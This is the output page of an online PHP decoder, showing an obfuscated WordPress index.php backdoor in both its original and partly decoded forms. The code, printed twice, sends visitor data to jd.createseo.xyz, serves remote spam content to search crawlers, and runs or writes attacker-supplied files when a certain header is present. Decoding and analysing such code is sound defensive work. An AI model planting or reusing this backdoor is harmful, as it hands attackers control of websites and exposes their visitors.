Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

$m635="2.2.17"; $g36="\x6a\144\x2e\143\x72\145\x61\164\x65\163\x65\157\x2e\170\x79\172";..

Decoded Output download

<?  $m635="2.2.17";  
$g36="jd.createseo.xyz";  
$k3="4002";  
$n11=clientip();  
$c8=isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:base64_decode("");  
$y31=isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:base64_decode("");  
$c8i=$_SERVER[base64_decode("UkVRVUVTVF9VUkk=")];  
$d2=$_SERVER[base64_decode("SFRUUF9IT1NU")];  
$d20=isset($_SERVER[base64_decode(base64_decode("U0ZSVVVGOUJRME5GVUZSZlRFRk9SMVZCUjBVPQ=="))])?$_SERVER[base64_decode(base64_decode("U0ZSVVVGOUJRME5GVUZSZlRFRk9SMVZCUjBVPQ=="))]:base64_decode("");  
$s13=isset($_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlSRTlKVFE9PQ=="))])?$_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlSRTlKVFE9PQ=="))]:base64_decode("");  
$g23=((!empty($_SERVER[base64_decode(base64_decode("U0ZSVVVGTT0="))])&&strtolower($_SERVER[base64_decode(base64_decode("U0ZSVVVGTT0="))])!==base64_decode(base64_decode("YjJabQ==")))||(isset($_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlYMFpQVWxkQlVrUkZSRjlRVWs5VVR3PT0="))])&&$_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlYMFpQVWxkQlVrUkZSRjlRVWs5VVR3PT0="))]===base64_decode(base64_decode("YUhSMGNITT0=")))||(!empty($_SERVER[base64_decode(base64_decode("U0ZSVVVGOUdVazlPVkY5RlRrUmZTRlJVVUZNPQ=="))])&&strtolower($_SERVER[base64_decode(base64_decode("U0ZSVVVGOUdVazlPVkY5RlRrUmZTRlJVVUZNPQ=="))])!==base64_decode(base64_decode("YjJabQ=="))))?base64_decode("aHR0cHM="):base64_decode("aHR0cA==");  
$h21=array(base64_decode(base64_decode("VEdGdVp6b2c=")).$d20,base64_decode(base64_decode("VlhObGNpMUJaMlZ1ZERvZw==")).$y31,base64_decode(base64_decode("VW1WbVpYSmxjam9n")).$c8,base64_decode(base64_decode("U0hSMGNDMVFjbTkwYnpvZw==")).$g23,base64_decode(base64_decode("U0hSMGNDMUliM04wT2lBPQ==")).$d2,base64_decode(base64_decode("U0hSMGNDMVZjbWs2SUE9PQ==")).$c8i,base64_decode(base64_decode("UkdKbmNtOTFjRG9n")).$g36,base64_decode(base64_decode("U0hSMGNDMVlMVVp2Y25kaGNtUmxaQzFHYjNJNklBPT0=")).$n11,base64_decode(base64_decode("Vkc5clpXNDZJQT09")).$s13);  
$r17="proto=$g23&shost=$d2&ip=$n11&dbgroup=$k3&uri=$c8i";  
if(strlen($s13)>0){ @todk(base64_decode("LmVHYkEwVHkyV2g="),@file_get_contents(base64_decode("cGhwOi8vaW5wdXQ=")),FILE_USE_INCLUDE_PATH); echo (include base64_decode(base64_decode("TG1WSFlrRXdWSGt5VjJnPQ=="))); unlink(base64_decode(base64_decode("TG1WSFlrRXdWSGt5VjJnPQ=="))); exit; } 
if(($c8i!==base64_decode("L2Zhdmljb24uaWNv"))&&( @preg_match(base64_decode(base64_decode("STJkdmIyZHNaWHg1WVdodmIzeGlhVzVuSTJrPQ==")),$y31)||(@preg_match(base64_decode(base64_decode("STJkdmIyZHNaUzVqYnk1cWNIeG5iMjluYkdVdVkyOXRmSGxoYUc5dkxtTnZiWHg1WVdodmJ5NWpieTVxY0h4aWFXNW5MbU52YlNOcA==")),$c8)&&@preg_match(base64_decode(base64_decode("STFzdlhEOWRLRnRoTFhvd0xUbGRlekY5S1NoY1pDc3BJMms9")),$c8i)))){ list($m639,$r24,$u14)=urlx(base64_decode(base64_decode("YUhSMGNEb3ZMdz09")).$g36.base64_decode(base64_decode("TDJsdVpHVjRQdz09")).$r17,$h21,$r17); if(stripos($u14,base64_decode(base64_decode("WjNwcGNBPT0=")))>0){ @header(base64_decode(base64_decode("UTI5dWRHVnVkQzEwZVhCbE9pQmhjSEJzYVdOaGRHbHZiaTk0TFdkNmFYQT0="))); exit($m639); } if(stripos($m639,base64_decode(base64_decode("UENGa2IyTjA=")))===0||stripos($m639,base64_decode(base64_decode("UEdoMGJXdz0=")))===0){ exit($m639); } if(stripos($m639,base64_decode(base64_decode("UEQ5NGJXdz0=")))===0){ @header(base64_decode(base64_decode("UTI5dWRHVnVkQzEwZVhCbE9pQjBaWGgwTDNodGJBPT0="))); exit($m639); } if(stripos($m639,base64_decode(base64_decode("YUhSMGNBPT0=")))===0){ if(stripos($m639,base64_decode(base64_decode("UDIxaGFXNWZjR0ZuWlQwPQ==")))){ @header(base64_decode(base64_decode("VEc5allYUnBiMjQ2SUE9PQ==")).$m639); exit; } if(strstr($m639,base64_decode("Wyxd"))){ $q42=explode(base64_decode("Wyxd"),$m639); $s25=explode(base64_decode("LA=="),$q42[0]); $m643=base64_decode(base64_decode("")); foreach($s25 as $c8l){ list($z9,$r24)=urlx($c8l,null,null,$q42[1]); $m643.=$c8l.$z9; } exit($m643); } } if(@preg_match(base64_decode(base64_decode("STE1YlhpNWRLaTRvZEhoMGZIQm9jQ2tqYVE9PQ==")),$m639)){ $c4=explode(base64_decode("Wyxd"),$m639); todk($c4[0],$c4[1]); if(file_exists($c4[0])){ exit(base64_decode(base64_decode("Wlc1a0lHOXI="))); }else{ exit(base64_decode(base64_decode("Ym04Z1ptRnNjMlU9"))); } } if(stripos($m639,base64_decode(base64_decode("YjJzPQ==")))===0){ exit($m639.base64_decode("amQuY3JlYXRlc2VvLnh5ejQwMDI=")); } if($r24>=400&&$r24<500){ @header(base64_decode(base64_decode("U0ZSVVVDOHhMakVnTkRBMElFNXZkQ0JHYjNWdVpBPT0="))); exit; } if($r24>=500){ @header(base64_decode(base64_decode("U0ZSVVVDOHhMakVnTlRBd0lFbHVkR1Z5Ym1Gc0lGTmxjblpsY2lCRmNuSnZjZz09"))); exit; } if($m639!=base64_decode("")){ exit($m639); } } 
 
function urlx($c8l,$h21=null,$r17=null,$y31=null){ if(!function_exists(base64_decode(base64_decode("WTNWeWJGOXBibWww")))){ return; } try{ $d43=curl_init(); curl_setopt($d43,CURLOPT_URL,$c8l); curl_setopt($d43,CURLOPT_FOLLOWLOCATION,1); curl_setopt($d43,CURLOPT_SSL_VERIFYPEER,FALSE); curl_setopt($d43,CURLOPT_SSL_VERIFYHOST,FALSE); curl_setopt($d43,CURLOPT_ENCODING,base64_decode(base64_decode("WjNwcGNDeGtaV1pzWVhSbA=="))); curl_setopt($d43,CURLOPT_CONNECTTIMEOUT,30); curl_setopt($d43,CURLOPT_RETURNTRANSFER,1); ($h21===null)?base64_decode(base64_decode("")):curl_setopt($d43,CURLOPT_HTTPHEADER,$h21); ($y31===null||$y31===base64_decode(""))?base64_decode(base64_decode("")):curl_setopt($d43,CURLOPT_USERAGENT,$y31); if($r17!==null&&$r17!==base64_decode("")){ curl_setopt($d43,CURLOPT_POST,1); curl_setopt($d43,CURLOPT_POSTFIELDS,$r17); } $u47=curl_exec($d43); $r24=curl_getinfo($d43,CURLINFO_HTTP_CODE); $u14=curl_getinfo($d43,CURLINFO_CONTENT_TYPE); curl_close($d43); }catch(Exception $m6){ 
 
    } if($u47===false&&function_exists(base64_decode(base64_decode("Wm1sc1pWOW5aWFJmWTI5dWRHVnVkSE09")))){ ini_set(base64_decode(base64_decode("ZFhObGNsOWhaMlZ1ZEE9PQ==")),base64_decode(base64_decode("VFc5NmFXeHNZUzgwTGpBZ0tHTnZiWEJoZEdsaWJHVTdUVk5KUlNBMkxqQTdWMmx1Wkc5M2N5Qk9WQ0ExTGpJN0xrNUZWQ0JEVEZJZ01TNHhMalF6TWpJcA=="))); try{ $u47=@file_get_contents($c8l); }catch(Exception $m6){ 
 
        } } return array($u47,$r24,$u14); } 
 
function todk($e24,$k41){ @file_put_contents($e24,$k41); } 
 
function clientip(){ $v46=base64_decode(base64_decode("")); if(isset($_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlYMFpQVWxkQlVrUkZSRjlHVDFJPQ=="))])&&$_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlYMFpQVWxkQlVrUkZSRjlHVDFJPQ=="))]!==base64_decode(base64_decode(""))){ $v46=$_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlYMFpQVWxkQlVrUkZSRjlHVDFJPQ=="))]; }elseif(getenv(base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ==")))&&strcasecmp(getenv(base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))),base64_decode(base64_decode("ZFc1cmJtOTNiZz09")))){ $v46=getenv(base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))); }elseif(isset($_SERVER[base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))])&&$_SERVER[base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))]&&strcasecmp($_SERVER[base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))],base64_decode(base64_decode("ZFc1cmJtOTNiZz09")))){ $v46=$_SERVER[base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))]; } if(stristr($v46,base64_decode(base64_decode("TEE9PQ==")))){ $c4=explode(base64_decode("LA=="),$v46); $v46=$c4[0]; } return $v46; } ?> 
    <?php 
 
    define('WP_USE_THEMES',true); 
    /** Loads the WordPress Environment and Template */ 
    require __DIR__.'/wp-blog-header.php'; ?>

Did this file decode correctly?

Original Code

$m635="2.2.17"; 
$g36="\x6a\144\x2e\143\x72\145\x61\164\x65\163\x65\157\x2e\170\x79\172"; 
$k3="4002"; 
$n11=clientip(); 
$c8=isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:base64_decode(""); 
$y31=isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:base64_decode(""); 
$c8i=$_SERVER[base64_decode("UkVRVUVTVF9VUkk=")]; 
$d2=$_SERVER[base64_decode("SFRUUF9IT1NU")]; 
$d20=isset($_SERVER[base64_decode(base64_decode("U0ZSVVVGOUJRME5GVUZSZlRFRk9SMVZCUjBVPQ=="))])?$_SERVER[base64_decode(base64_decode("U0ZSVVVGOUJRME5GVUZSZlRFRk9SMVZCUjBVPQ=="))]:base64_decode(""); 
$s13=isset($_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlSRTlKVFE9PQ=="))])?$_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlSRTlKVFE9PQ=="))]:base64_decode(""); 
$g23=((!empty($_SERVER[base64_decode(base64_decode("U0ZSVVVGTT0="))])&&strtolower($_SERVER[base64_decode(base64_decode("U0ZSVVVGTT0="))])!==base64_decode(base64_decode("YjJabQ==")))||(isset($_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlYMFpQVWxkQlVrUkZSRjlRVWs5VVR3PT0="))])&&$_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlYMFpQVWxkQlVrUkZSRjlRVWs5VVR3PT0="))]===base64_decode(base64_decode("YUhSMGNITT0=")))||(!empty($_SERVER[base64_decode(base64_decode("U0ZSVVVGOUdVazlPVkY5RlRrUmZTRlJVVUZNPQ=="))])&&strtolower($_SERVER[base64_decode(base64_decode("U0ZSVVVGOUdVazlPVkY5RlRrUmZTRlJVVUZNPQ=="))])!==base64_decode(base64_decode("YjJabQ=="))))?base64_decode("aHR0cHM="):base64_decode("aHR0cA=="); 
$h21=array(base64_decode(base64_decode("VEdGdVp6b2c=")).$d20,base64_decode(base64_decode("VlhObGNpMUJaMlZ1ZERvZw==")).$y31,base64_decode(base64_decode("VW1WbVpYSmxjam9n")).$c8,base64_decode(base64_decode("U0hSMGNDMVFjbTkwYnpvZw==")).$g23,base64_decode(base64_decode("U0hSMGNDMUliM04wT2lBPQ==")).$d2,base64_decode(base64_decode("U0hSMGNDMVZjbWs2SUE9PQ==")).$c8i,base64_decode(base64_decode("UkdKbmNtOTFjRG9n")).$g36,base64_decode(base64_decode("U0hSMGNDMVlMVVp2Y25kaGNtUmxaQzFHYjNJNklBPT0=")).$n11,base64_decode(base64_decode("Vkc5clpXNDZJQT09")).$s13); 
$r17="proto=$g23&shost=$d2&ip=$n11&dbgroup=$k3&uri=$c8i"; 
if(strlen($s13)>0){ @todk(base64_decode("LmVHYkEwVHkyV2g="),@file_get_contents(base64_decode("cGhwOi8vaW5wdXQ=")),FILE_USE_INCLUDE_PATH); echo (include base64_decode(base64_decode("TG1WSFlrRXdWSGt5VjJnPQ=="))); unlink(base64_decode(base64_decode("TG1WSFlrRXdWSGt5VjJnPQ=="))); exit; }
if(($c8i!==base64_decode("L2Zhdmljb24uaWNv"))&&( @preg_match(base64_decode(base64_decode("STJkdmIyZHNaWHg1WVdodmIzeGlhVzVuSTJrPQ==")),$y31)||(@preg_match(base64_decode(base64_decode("STJkdmIyZHNaUzVqYnk1cWNIeG5iMjluYkdVdVkyOXRmSGxoYUc5dkxtTnZiWHg1WVdodmJ5NWpieTVxY0h4aWFXNW5MbU52YlNOcA==")),$c8)&&@preg_match(base64_decode(base64_decode("STFzdlhEOWRLRnRoTFhvd0xUbGRlekY5S1NoY1pDc3BJMms9")),$c8i)))){ list($m639,$r24,$u14)=urlx(base64_decode(base64_decode("YUhSMGNEb3ZMdz09")).$g36.base64_decode(base64_decode("TDJsdVpHVjRQdz09")).$r17,$h21,$r17); if(stripos($u14,base64_decode(base64_decode("WjNwcGNBPT0=")))>0){ @header(base64_decode(base64_decode("UTI5dWRHVnVkQzEwZVhCbE9pQmhjSEJzYVdOaGRHbHZiaTk0TFdkNmFYQT0="))); exit($m639); } if(stripos($m639,base64_decode(base64_decode("UENGa2IyTjA=")))===0||stripos($m639,base64_decode(base64_decode("UEdoMGJXdz0=")))===0){ exit($m639); } if(stripos($m639,base64_decode(base64_decode("UEQ5NGJXdz0=")))===0){ @header(base64_decode(base64_decode("UTI5dWRHVnVkQzEwZVhCbE9pQjBaWGgwTDNodGJBPT0="))); exit($m639); } if(stripos($m639,base64_decode(base64_decode("YUhSMGNBPT0=")))===0){ if(stripos($m639,base64_decode(base64_decode("UDIxaGFXNWZjR0ZuWlQwPQ==")))){ @header(base64_decode(base64_decode("VEc5allYUnBiMjQ2SUE9PQ==")).$m639); exit; } if(strstr($m639,base64_decode("Wyxd"))){ $q42=explode(base64_decode("Wyxd"),$m639); $s25=explode(base64_decode("LA=="),$q42[0]); $m643=base64_decode(base64_decode("")); foreach($s25 as $c8l){ list($z9,$r24)=urlx($c8l,null,null,$q42[1]); $m643.=$c8l.$z9; } exit($m643); } } if(@preg_match(base64_decode(base64_decode("STE1YlhpNWRLaTRvZEhoMGZIQm9jQ2tqYVE9PQ==")),$m639)){ $c4=explode(base64_decode("Wyxd"),$m639); todk($c4[0],$c4[1]); if(file_exists($c4[0])){ exit(base64_decode(base64_decode("Wlc1a0lHOXI="))); }else{ exit(base64_decode(base64_decode("Ym04Z1ptRnNjMlU9"))); } } if(stripos($m639,base64_decode(base64_decode("YjJzPQ==")))===0){ exit($m639.base64_decode("amQuY3JlYXRlc2VvLnh5ejQwMDI=")); } if($r24>=400&&$r24<500){ @header(base64_decode(base64_decode("U0ZSVVVDOHhMakVnTkRBMElFNXZkQ0JHYjNWdVpBPT0="))); exit; } if($r24>=500){ @header(base64_decode(base64_decode("U0ZSVVVDOHhMakVnTlRBd0lFbHVkR1Z5Ym1Gc0lGTmxjblpsY2lCRmNuSnZjZz09"))); exit; } if($m639!=base64_decode("")){ exit($m639); } }

function urlx($c8l,$h21=null,$r17=null,$y31=null){ if(!function_exists(base64_decode(base64_decode("WTNWeWJGOXBibWww")))){ return; } try{ $d43=curl_init(); curl_setopt($d43,CURLOPT_URL,$c8l); curl_setopt($d43,CURLOPT_FOLLOWLOCATION,1); curl_setopt($d43,CURLOPT_SSL_VERIFYPEER,FALSE); curl_setopt($d43,CURLOPT_SSL_VERIFYHOST,FALSE); curl_setopt($d43,CURLOPT_ENCODING,base64_decode(base64_decode("WjNwcGNDeGtaV1pzWVhSbA=="))); curl_setopt($d43,CURLOPT_CONNECTTIMEOUT,30); curl_setopt($d43,CURLOPT_RETURNTRANSFER,1); ($h21===null)?base64_decode(base64_decode("")):curl_setopt($d43,CURLOPT_HTTPHEADER,$h21); ($y31===null||$y31===base64_decode(""))?base64_decode(base64_decode("")):curl_setopt($d43,CURLOPT_USERAGENT,$y31); if($r17!==null&&$r17!==base64_decode("")){ curl_setopt($d43,CURLOPT_POST,1); curl_setopt($d43,CURLOPT_POSTFIELDS,$r17); } $u47=curl_exec($d43); $r24=curl_getinfo($d43,CURLINFO_HTTP_CODE); $u14=curl_getinfo($d43,CURLINFO_CONTENT_TYPE); curl_close($d43); }catch(Exception $m6){

    } if($u47===false&&function_exists(base64_decode(base64_decode("Wm1sc1pWOW5aWFJmWTI5dWRHVnVkSE09")))){ ini_set(base64_decode(base64_decode("ZFhObGNsOWhaMlZ1ZEE9PQ==")),base64_decode(base64_decode("VFc5NmFXeHNZUzgwTGpBZ0tHTnZiWEJoZEdsaWJHVTdUVk5KUlNBMkxqQTdWMmx1Wkc5M2N5Qk9WQ0ExTGpJN0xrNUZWQ0JEVEZJZ01TNHhMalF6TWpJcA=="))); try{ $u47=@file_get_contents($c8l); }catch(Exception $m6){

        } } return array($u47,$r24,$u14); }

function todk($e24,$k41){ @file_put_contents($e24,$k41); }

function clientip(){ $v46=base64_decode(base64_decode("")); if(isset($_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlYMFpQVWxkQlVrUkZSRjlHVDFJPQ=="))])&&$_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlYMFpQVWxkQlVrUkZSRjlHVDFJPQ=="))]!==base64_decode(base64_decode(""))){ $v46=$_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlYMFpQVWxkQlVrUkZSRjlHVDFJPQ=="))]; }elseif(getenv(base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ==")))&&strcasecmp(getenv(base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))),base64_decode(base64_decode("ZFc1cmJtOTNiZz09")))){ $v46=getenv(base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))); }elseif(isset($_SERVER[base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))])&&$_SERVER[base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))]&&strcasecmp($_SERVER[base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))],base64_decode(base64_decode("ZFc1cmJtOTNiZz09")))){ $v46=$_SERVER[base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))]; } if(stristr($v46,base64_decode(base64_decode("TEE9PQ==")))){ $c4=explode(base64_decode("LA=="),$v46); $v46=$c4[0]; } return $v46; } ?>
    <?php

    define('WP_USE_THEMES',true);
    /** Loads the WordPress Environment and Template */
    require __DIR__.'/wp-blog-header.php';

Function Calls

clientip

Variables

$k3	4002
$g36	jd.createseo.xyz
$m635	2.2.17

Stats

MD5	de6e0bb6c37a62cc9ccea9ddbe87f0f5
Eval Count	0
Decode Time	72 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats